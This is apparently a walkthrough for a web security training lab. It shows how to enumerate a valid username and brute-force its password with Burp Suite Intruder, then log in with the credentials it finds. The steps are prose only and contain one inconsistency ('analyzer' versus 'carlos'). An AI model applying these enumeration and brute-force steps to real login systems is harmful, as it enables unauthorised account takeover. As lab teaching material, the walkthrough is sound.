Username enumeration via different responses
We can click on My Account in order to login.
We can view the Proxy > HTTP History in Burp Suite to view this request.
Let's forward it to the Intruder and add a payload field to the username parameter.
Next we can go to the Payloads tab and set the Payload type to Simple list. Once that is done, we can paste the usernames provided to us here in the Payloads settings section.
Let's start the attack.
We can observe that the request with username set to analyzer returned a different response than the others.
This is because this username was correct whereas the others weren't.
Now we can craft another attack by setting the username parameter to carlos and adding a payload field to the password parameter.
In the Payloads tab we will again be using a Simple list.
Let's paste the passwords provided to use here in the Paeyloads section.
We are now set to start the attack.
As we can see, the request with the password set to 1234567890 gives a 302 response.
Now that we know what the username and password are, let's login.
| Username | Password |
|---|---|
| analyzer | 1234567890 |
We have solved the lab.